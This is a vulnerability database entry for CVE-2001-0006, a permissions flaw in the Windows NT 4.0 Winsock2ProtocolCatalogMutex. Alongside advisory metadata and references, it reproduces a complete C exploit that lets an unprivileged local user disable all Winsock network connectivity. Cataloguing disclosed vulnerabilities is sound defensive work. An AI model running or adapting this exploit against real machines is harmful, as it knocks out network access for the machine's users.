Windows NT Winsock2ProtocolCatalogMutex Mutex Permissions Vulnerability

Vulnerability ID 1106185 Vulnerability type Unknown
Published 2001-01-24 Updated 2005-10-12
CVE ID CVE-2001-0006 CNNVD-ID CNNVD-200102-020
Platform Windows CVSS score 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/20596
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-020
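|Vulnerability details
The Winsock2ProtocolCatalogMutex mutex in Windows NT 4.0 has inappropriate Everyone/Full Control permissions. A local user can exploit this to change the permissions to "No Access" and disable Winsock network connectivity. This is also known as the "Winsock Mutex" vulnerability.
|Exploit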
source: http://www.securityfocus.com/bid/2303/info

Microsoft Windows NT 4.0 is subject to a denial of service due to the implementation of incorrect permissions in a Mutex object. A local user could gain control of the Mutex on a networked machine and deny all network communication. 

/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>
#include <stdlib.h>

int main(void)
{
	PSID pEveryoneSID;
	SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
	PACL pDacl;
	DWORD sizeNeeded;

	AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);
	sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(pEveryoneSID) - sizeof(DWORD);
	pDacl = (PACL) malloc(sizeNeeded);
	InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
	AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
	SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
	free(pDacl);
	return 0;
}
|References

Source: MS
Name: MS01-003
Link: http://www.microsoft.com/technet/security/bulletin/MS01-003.asp
Source: BUGTRAQ
Name: 20010126 ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=98075221915234&w=2
Source: XF
Name: winnt-mutex-dos(6006)
Link: http://xforce.iss.net/xforce/xfdb/6006